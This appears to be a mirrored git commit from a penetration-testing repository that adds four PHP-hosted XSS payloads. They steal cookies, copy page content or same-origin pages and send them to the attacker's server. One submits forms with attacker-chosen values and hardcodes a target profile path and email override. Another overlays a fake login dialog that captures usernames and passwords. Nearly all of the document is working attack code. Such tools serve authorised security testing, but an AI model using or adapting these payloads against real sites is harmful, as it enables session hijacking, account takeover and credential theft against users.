mirror of
https://github.com/nettitude/xss_payloads.git
synced 2024-09-20 06:21:58 +00:00
Added the PHP xss payloads
This commit is contained in:
Strawp
parent
79558b73e2
commit
dab2088267
4 changed files with 183 additions and 0 deletions
33
contentstealer.php
Executable file
33
contentstealer.php
Executable file
|
|
@ -0,0 +1,33 @@
|
|||
<?php
|
||||
/*
|
||||
Host on a server under your control in order to include as a javascript and have either the current page or a page of your choosing sent back via a GET
|
||||
*/
|
||||
header( "Content-type: text/javascript" );
|
||||
$url = "http://".$_SERVER["SERVER_ADDR"].$_SERVER["PHP_SELF"];
|
||||
echo "// $url\n";
|
||||
if( !isset( $_GET["c"] ) ){
|
||||
echo "/*\n Inject with:\n ".$url."?id=userDiv or ".$url."?tag=ul\n";
|
||||
echo " Where:\n"
|
||||
." id is the id of an element to be grabbed\n"
|
||||
." tag is the name of all tags to be grabbed.\n"
|
||||
." url is a URL within the same origin to download and return\n"
|
||||
."Defaults to tag=body\n*/\n\n";
|
||||
if( !empty( $_GET["url"] ) ){
|
||||
echo "function g(u){ x=new XMLHttpRequest(); x.open('GET',u,false); x.send(null); return x.responseText; }\n"
|
||||
."var content = g('".$_GET["url"]."');\n";
|
||||
}elseif( !empty( $_GET["id"] ) ){
|
||||
echo "var content = document.getElementById('".$_GET["id"]."').outerHTML;\n";
|
||||
}else{
|
||||
if( empty( $_GET["tag"] ) ) $_GET["tag"] = "body";
|
||||
echo "var content = '';\n";
|
||||
echo "var col = document.getElementsByTagName('".$_GET["tag"]."');\n";
|
||||
echo "for( var i=0; i<col.length; i++ ){ content += col[i].outerHTML + '\\n'; }\n";
|
||||
}
|
||||
?>
|
||||
var url = "<?php echo $url; ?>?c=" + encodeURIComponent(btoa(content));
|
||||
f = document.createElement('iframe');
|
||||
f.src = url;
|
||||
document.getElementsByTagName('body')[0].appendChild(f);
|
||||
<?php }else{
|
||||
echo "/*\n".base64_decode( $_GET["c"] )."\n*/\n";
|
||||
}?>
|
||||
14
cookiestealer.php
Executable file
14
cookiestealer.php
Executable file
|
|
@ -0,0 +1,14 @@
|
|||
<?php
|
||||
// For hosting on a remote web service in order to post back cookies from a XSS vuln page
|
||||
// Either pull the cookie data out of logs or see the decoded cookie in the response if running a packet sniffer on the host
|
||||
$url = "http://".$_SERVER["SERVER_ADDR"].$_SERVER["PHP_SELF"];
|
||||
echo "// $url\n";
|
||||
if( !isset( $_GET["c"] ) ){
|
||||
?>
|
||||
var url = "<?php echo $url; ?>?c=" + encodeURIComponent(btoa(document.cookie));
|
||||
f = document.createElement('iframe');
|
||||
f.src = url;
|
||||
document.getElementsByTagName('body')[0].appendChild(f);
|
||||
<?php }else{
|
||||
echo "/*\n".base64_decode( $_GET["c"] )."\n*/\n";
|
||||
}?>
|
||||
80
formsubmitter.php
Executable file
80
formsubmitter.php
Executable file
|
|
@ -0,0 +1,80 @@
|
|||
<?php
|
||||
/*
|
||||
Inject into a page in order to retrieve and submit a form from another page
|
||||
*/
|
||||
header( "Content-type: text/javascript" );
|
||||
$url = "//".$_SERVER["SERVER_ADDR"].$_SERVER["PHP_SELF"];
|
||||
echo "// $url\n";
|
||||
if( !isset( $_GET["c"] ) ){
|
||||
echo "/*\n Inject with:\n ".$url."?form=0&el[email]=someone@somewhere.com&el[password]=Password123&url=createuser.php\n";
|
||||
echo " Where:\n"
|
||||
." form is the zero-based index of the form on the page you want to submit\n"
|
||||
." el[] is a keyed array of form values to set on the form\n"
|
||||
." url is the URL of the form you want to submit\n"
|
||||
." action is an overide action URL to set the form to\n"
|
||||
."*/\n";
|
||||
|
||||
$form = !empty( $_GET["form"] ) ? intval($_GET["form"]) : '0';
|
||||
$els = !empty( $_GET["el"] ) ? $_GET["el"] : null;
|
||||
$els["dnn\$ctr441\$ProfileEditor\$EmailTextBox"] = 'iwallace@nettitude.com';
|
||||
|
||||
// Function to get page
|
||||
echo "
|
||||
function g(u){
|
||||
console.log('g()');
|
||||
x=new XMLHttpRequest();
|
||||
x.open('GET',u,true);
|
||||
x.onload = function(e){
|
||||
console.log('Loaded', x);
|
||||
if( x.readyState === 4 && x.status === 200 ){
|
||||
procFrm(x.responseText);
|
||||
}
|
||||
};
|
||||
x.send(null);
|
||||
}\n";
|
||||
|
||||
// Function to handle loading of iframe
|
||||
echo "
|
||||
function ifload(){
|
||||
content = document.getElementById('xss_target').contentDocument.body.innerHTML;
|
||||
new Image().src = '".$url."?loaded&c=' + encodeURIComponent(btoa(content));
|
||||
}
|
||||
";
|
||||
|
||||
// Function to add form to current page, add an iframe, change target to iframe, set fields, submit
|
||||
echo "
|
||||
function procFrm(html){
|
||||
parser = new DOMParser();
|
||||
doc = parser.parseFromString(html,'text/html');
|
||||
frm = doc.getElementsByTagName('form')[$form];
|
||||
console.log(frm);
|
||||
frm.id = 'xss_submitform';
|
||||
// frm.style = 'display: none;';
|
||||
b = document.getElementsByTagName('body')[0];
|
||||
b.appendChild( frm );
|
||||
frm = document.getElementById('xss_submitform');
|
||||
b.innerHTML += '<iframe name=\"xss_target\" id=\"xss_target\" style=\"display: none;\"></iframe>';
|
||||
document.getElementById('xss_target').onload = ifload;
|
||||
frm.target = 'xss_target';\n";
|
||||
echo "frm.onsubmit = ''\n";
|
||||
if( isset( $_GET["action"] ) ){
|
||||
echo " frm.action = '".$_GET["action"]."';\n";
|
||||
}
|
||||
if( isset( $els ) ){
|
||||
foreach( $els as $k => $v ){
|
||||
echo " frm.elements.namedItem('$k').value = '$v';\n";
|
||||
echo " console.log(frm.elements.namedItem('$k').value);\n";
|
||||
}
|
||||
}
|
||||
echo " frm.submit();
|
||||
}
|
||||
";
|
||||
|
||||
// Call function to get the page, pass function to process the form
|
||||
echo "
|
||||
g('/Home/Settings/MyProfile/tabid/62/userid/100417/Default.aspx');\n";
|
||||
// g('".$_GET["url"]."');\n";
|
||||
?>
|
||||
<?php }else{
|
||||
echo "/*\n".base64_decode( $_GET["c"] )."\n*/\n";
|
||||
}?>
|
||||
56
loginpage.php
Normal file
56
loginpage.php
Normal file
|
|
@ -0,0 +1,56 @@
|
|||
<?php
|
||||
/*
|
||||
Call this script from an injected <script> tag to pop up a modal dialog prompting for username and password which will send back creds to the same script
|
||||
*/
|
||||
if( isset( $_GET["username"] ) ){
|
||||
if( isset( $_SERVER['HTTP_REFERER'] ) ){
|
||||
header( "Location: ".$_SERVER['HTTP_REFERER'] );
|
||||
}else{
|
||||
echo "<script>window.history.back();</script>";
|
||||
}
|
||||
exit;
|
||||
}
|
||||
header( "Content-type: text/javascript" );
|
||||
if( isset( $_SERVER['HTTPS'] ) && $_SERVER['HTTPS'] ){
|
||||
$self = "https://";
|
||||
}else{
|
||||
$self = "http://";
|
||||
}
|
||||
$self .= $_SERVER['SERVER_NAME'].$_SERVER['SCRIPT_NAME'];
|
||||
$html = "
|
||||
<style>
|
||||
#login_modal_fade {
|
||||
position: absolute;
|
||||
width: 100%;
|
||||
height: 100%;
|
||||
top: 0;
|
||||
left: 0;
|
||||
background: black;
|
||||
opacity: 0.9;
|
||||
}
|
||||
#login_modal_container {
|
||||
position: absolute;
|
||||
top: 20%;
|
||||
left: 30%;
|
||||
width: 30%;
|
||||
background: white;
|
||||
padding: 0 1em;
|
||||
border: 1px solid black;
|
||||
border-radius: 5px;
|
||||
}
|
||||
#login_modal_container label {
|
||||
width: 20%;
|
||||
}
|
||||
</style>
|
||||
<div id='login_modal_fade'></div>
|
||||
<div id='login_modal_container'>
|
||||
<form method='get' action='$self'>
|
||||
<h2>Log in</h2>
|
||||
<div class='field'><label>Username: </label><input type='text' name='username'></div>
|
||||
<div class='field'><label>Password: </label><input type='password' name='password'></div>
|
||||
<div class='buttons'><input type='submit' value='Log in'></div>
|
||||
</form>
|
||||
</div>";
|
||||
$html = preg_replace( "/[\n\r]/", "", $html );
|
||||
echo "document.body.innerHTML += \"$html\";";
|
||||
?>
|
||||
Loading…
Reference in a new issue